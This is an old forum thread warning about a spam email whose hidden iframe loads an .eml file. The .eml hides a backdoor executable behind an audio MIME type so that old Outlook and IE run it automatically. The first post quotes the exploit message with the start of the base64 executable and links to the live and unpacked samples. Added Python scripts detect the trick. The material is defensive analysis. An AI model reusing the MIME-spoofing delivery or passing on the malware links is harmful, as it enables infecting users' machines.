Armenian Knowledge Base  

Old 22.04.2002, 16:55   #1
dolphin
*** WARNING! ***

Code:
Received: from ns1.nrl.netsys.am (fw1.netsys.am [80.86.224.39])
	by wind.freenet.am (8.11.1/8.11.1) with ESMTP id g3LKnF925868
	for <[email protected]>; Mon, 22 Apr 2002 01:49:16 +0500 (GMT)
Received: from  (dialup.netsys.am [80.86.229.173]) by ns1.nrl.netsys.am
 (Rockliffe SMTPRA 4.5.6) with SMTP id <[email protected]> for <[email protected]>;
 Mon, 22 Apr 2002 01:14:09 +0500
Date: Mon, 22 Apr 2002 01:14:09 +0500
Message-ID: <[email protected]>
From: Web<[email protected]>
To: [email protected]
Subject: nor haykakan projekt
Mime-Version: 1.0
Content-Type: text/html;
  charset=windows-1251
X-UIDL: d\p"!Hm%"!mG,!!7GC"!
Status: R 
X-Status: N


http://www.armenia.com.uk  -um bacvel e nor sayt hayastani evropayi xorhurd andamakcelu veraberyal.
Bolord mteq yev qvyarkeq i ogut hayastani
<IFRAME height=0 src="http://freenet.am/~nemar/index.eml" 
width=0></IFRAME>
http://freenet.am/~nemar/index.eml contains the following: (Attention! If you are running Windows and MS IE/Outlook, DO NOT try to download and open this file!)

Code:
From: "xxxxx"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--1
Content-Type: multipart/alternative; 
        boundary="2"

 
--2
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable 

<HTML>
<HEAD>
</HEAD> 
<BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>



</BODY>
</HTML>

--2--

--1
Content-Type: audio/x-wav;
        name="hh.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>


TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAuAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAADbpM3bn8WjiJ/Fo4ifxaOIn8WjiP/Fo4hj5bGIncWjiFjDpYiexaOIUmlj
.....
Then follows the base64-encoded hh.exe file, which will probably be automatically executed by some new versions of MS IE and Outlook...

I'm sure that it is infected with some trojan program and may be dangerous.

Here is the extracted hh.exe: http://dolphin.nt.am/VIRUS/hh.exe

If you have some recently updated antivirus program (AVP recommended), please download this file with care (!!only download, do not open!!)
and check it. Please post the results here.

(I'm running Linux and can't do it myself)

Thanks in advance!

__________________
[ que fors aus ne le sot riens nee ]
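The mechanism dolphin quotes above (a hidden IFRAME pulling an .eml whose HTML part iframes a cid: attachment that is declared audio/x-wav but begins with an MZ header) can be checked mechanically. The block below is an added example, not code from the thread or from any poster: it parses a message, collects the cid: targets referenced from iframes in HTML parts, and flags any referenced part whose declared inline media type disagrees with the bytes it actually carries. The two sample messages are constructed to mirror the structure of the quoted index.eml; the "malicious" payload is only the first base64 line of the hh.exe dump shown on this page (a DOS/PE header stub, not the real file), and the benign variant carries a constructed RIFF/WAVE header for contrast.

```python
"""Static check for the trick quoted in this thread: an HTML part with a hidden
<iframe src=cid:...> pointing at a MIME part declared audio/x-wav that really
carries a PE executable (MZ header).  Added example, not code from the thread.
The messages are constructed after the quoted index.eml; the "malicious" payload
is only the first base64 line of the dump above (a DOS/PE header stub, not the
real hh.exe) and the benign one is a constructed RIFF/WAVE header."""
import base64
import email
import re
from email import policy

# After quoted-printable decoding the quoted sample reads
# <iframe src=cid:THE-CID height=0 width=0>: unquoted attribute, so quotes are optional.
IFRAME_CID_RE = re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']?cid:([^"\'\s>]+)', re.IGNORECASE)

# Declared types a mail client renders inline without asking the user.
INLINE_MEDIA_PREFIXES = ("audio/", "image/", "video/", "text/")

EML_TEMPLATE = b"""Subject: mail
MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="1"

--1
Content-Type: multipart/alternative; boundary="2"

--2
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe>
</BODY></HTML>

--2--

--1
Content-Type: audio/x-wav; name="hh.exe"
Content-Transfer-Encoding: base64
Content-ID: <THE-CID>

@PAYLOAD@
--1--
"""
# First base64 line of the hh.exe dump quoted above; decodes to b"MZ\x90\x00...".
PE_STUB_B64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# Constructed RIFF/WAVE header, so the same message shape can be tested as benign.
WAV_STUB_B64 = base64.b64encode(b"RIFF\x24\x00\x00\x00WAVEfmt " + bytes(24)).decode()
MALICIOUS_EML = EML_TEMPLATE.replace(b"@PAYLOAD@", PE_STUB_B64.encode())
BENIGN_EML = EML_TEMPLATE.replace(b"@PAYLOAD@", WAV_STUB_B64.encode())


def sniff(data: bytes) -> str:
    """Minimal magic-byte sniffing: just enough to tell a PE from a WAV."""
    if data[:2] == b"MZ":
        return "pe-executable"
    if data[:4] == b"RIFF" and data[8:12] == b"WAVE":
        return "wav-audio"
    return "unknown"


def find_cid_iframes(html: str) -> list:
    """Content-IDs referenced by <iframe src=cid:...> in one HTML body."""
    return IFRAME_CID_RE.findall(html)


def analyze(raw: bytes) -> list:
    """One record per leaf MIME part: declared type vs. sniffed content, and
    whether an iframe somewhere in the same message targets it by Content-ID."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    referenced = set()
    for p in leaves:
        if p.get_content_type() == "text/html":
            referenced.update(find_cid_iframes(p.get_content()))   # QP is decoded here
    findings = []
    for p in leaves:
        cid = (p.get("Content-ID") or "").strip().strip("<>")
        declared = p.get_content_type()
        sniffed = sniff(p.get_payload(decode=True) or b"")          # base64 is decoded here
        findings.append({
            "content_id": cid,
            "declared": declared,
            "filename": p.get_filename(),
            "sniffed": sniffed,
            "iframe_target": cid != "" and cid in referenced,
            "mismatch": sniffed == "pe-executable" and declared.startswith(INLINE_MEDIA_PREFIXES),
        })
    return findings


def is_mime_spoofed_executable(raw: bytes) -> bool:
    """True when a PE hides behind an inline media type and an iframe in the
    same message pulls it in via cid:, i.e. the exact shape of the quoted .eml."""
    return any(f["mismatch"] and f["iframe_target"] for f in analyze(raw))


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_EML), ("benign", BENIGN_EML)):
        print(label, is_mime_spoofed_executable(sample))
        for f in analyze(sample):
            print("  ", f)
```

The check deliberately keys on the combination (referenced from a hidden iframe *and* content/type mismatch) rather than on the audio/x-wav label alone, so a real WAV attached the same way is not flagged; to run it against a captured message, pass the raw bytes of the .eml to `analyze()` instead of the constructed samples.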
Old 22.04.2002, 17:25   #2
z0mbie

AVP & DrWeb (both updated today) find nothing, but it's definitely a trojan packed with ASPack.

As for "automatically executed": that only works on rare old versions of Outlook.
Old 22.04.2002, 19:45   #3
VX

Yes, that's a pretty old trick, downloading a file through an iframe.... lol
Remember, dolphin? So much water has flowed under the bridge since then.
Old 24.04.2002, 00:46   #4
Vazgen Abgaryan

Hello!
This file contains the new backdoor utility: DTR.14.c
The detection routine will be added with a daily update.

Best regards,
Valentin
___________________________________________________
Valentin Kolesnikov,
Kaspersky Labs
http://www.kaspersky.com
http://www.viruslist.com
Old 24.04.2002, 02:50   #5
Младенец

http://freenet.am/~softland/hh-unpck.exe

I got interested in this proggie, and I unpacked it (string references only, no import table; you need to run it to dump the IT, hehe) to understand how it works better. I uploaded it to my FTP and you can study how it works too.
Disassemble it with your favourite disassembler and a lot of things will become understandable....
Yeah, and don't execute it, hehe ::}
__________________
http://freenet.am/~softland
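Two of the replies make static observations about hh.exe: z0mbie says it is packed with ASPack, and the poster of the unpacked dump notes that it has no import table. The block below is an added example, not code from the thread or from any of the posters, of the kind of triage script that surfaces those signals from a PE file without running it: section names left behind by known packers (.aspack/.adata for ASPack, UPX0/UPX1 for UPX), high per-section entropy, and an empty import data directory. The two PE32 images it builds are synthetic, non-runnable test inputs constructed inside the script, and the 7.0-bit / 256-byte thresholds are an assumption of mine, not a standard.

```python
"""Static packer triage for a PE, the check behind "packed with ASPack" and
"no import table" in this thread.  Added example, not code from the thread.
It unpacks nothing: it reads the section table, measures per-section entropy
and inspects the import data directory.  The two PE32 images built below are
synthetic and not runnable; thresholds (7.0 bits, 256 bytes) are my choice."""
import hashlib
import math
import struct

# Section names ASPack (.aspack/.adata) and UPX (UPX0/UPX1) leave behind.
PACKER_SECTION_NAMES = {b".aspack", b".adata", b"UPX0", b"UPX1"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n, counts = len(data), [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF -> optional header -> sections."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", blob, opt)[0]
    dd_off = opt + (96 if magic == 0x10B else 112)                  # PE32 vs PE32+
    import_rva, import_size = struct.unpack_from("<II", blob, dd_off + 8)  # directory[1]
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from(
            "<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "vsize": vsize, "vaddr": vaddr,
                         "raw_size": rawsize,
                         "entropy": shannon_entropy(blob[rawptr:rawptr + rawsize])})
    return {"machine": machine, "import_rva": import_rva,
            "import_size": import_size, "sections": sections}


def packer_indicators(info: dict) -> list:
    """Human-readable reasons to suspect a packer; empty list means none found."""
    hits = []
    known = {s["name"] for s in info["sections"]} & PACKER_SECTION_NAMES
    if known:
        hits.append("packer section names: " + ", ".join(sorted(n.decode() for n in known)))
    for s in info["sections"]:
        if s["raw_size"] >= 256 and s["entropy"] > 7.0:
            hits.append("high entropy %.2f in %s" % (s["entropy"], s["name"].decode("ascii", "replace")))
    if info["import_size"] == 0:
        hits.append("no import directory (imports must be resolved at run time)")
    return hits


def is_probably_packed(blob: bytes) -> bool:
    return len(packer_indicators(parse_pe(blob))) >= 2


def build_pe(sections, import_dir=(0, 0)) -> bytes:
    """Assemble a minimal PE32 image (headers + raw sections) for testing only."""
    nsec, opt_size, align = len(sections), 96 + 16 * 8, 0x200
    hdr_end = 64 + 4 + 20 + opt_size + 40 * nsec
    raw_ptr = (hdr_end + align - 1) // align * align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[1] = import_dir                                            # import table entry
    opt = struct.pack("<H", 0x10B) + b"\0" * 94 + b"".join(struct.pack("<II", *d) for d in dirs)
    hdrs, body, vaddr = b"", b"", 0x1000
    for name, raw in sections:
        padded = raw + b"\0" * (-len(raw) % align)
        hdrs += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(raw), vaddr,
                            len(padded), raw_ptr + len(body), 0, 0, 0, 0, 0x60000020)
        body += padded
        vaddr += (len(padded) + 0xFFF) // 0x1000 * 0x1000
    head = dos + b"PE\0\0" + coff + opt + hdrs
    return head + b"\0" * (raw_ptr - len(head)) + body


def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for packed code."""
    out, seed = b"", b"aspack-demo"
    while len(out) < n:
        seed = hashlib.sha256(seed).digest()
        out += seed
    return out[:n]


# Constructed samples: a packed-looking layout and a plain one for contrast.
PACKED_SAMPLE = build_pe([(b".text", pseudo_random(2048)),
                          (b".aspack", pseudo_random(1024)),
                          (b".adata", b"\0" * 256)])
PLAIN_SAMPLE = build_pe([(b".text", b"\x55\x8b\xec" * 300 + b"\0" * 100),
                         (b".rdata", b"This program cannot be run in DOS mode\r\n" * 20)],
                        import_dir=(0x3000, 40))

if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("plain", PLAIN_SAMPLE)):
        print(label, is_probably_packed(blob), packer_indicators(parse_pe(blob)))
```

On a real sample you would feed `open(path, "rb").read()` to `parse_pe()`; a genuine ASPack-packed file normally keeps a tiny import directory (LoadLibrary/GetProcAddress) rather than none, which is why the script reports the indicators separately instead of collapsing them into one score.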
Powered by vBulletin® Copyright ©2000 - 2017, Jelsoft Enterprises Ltd.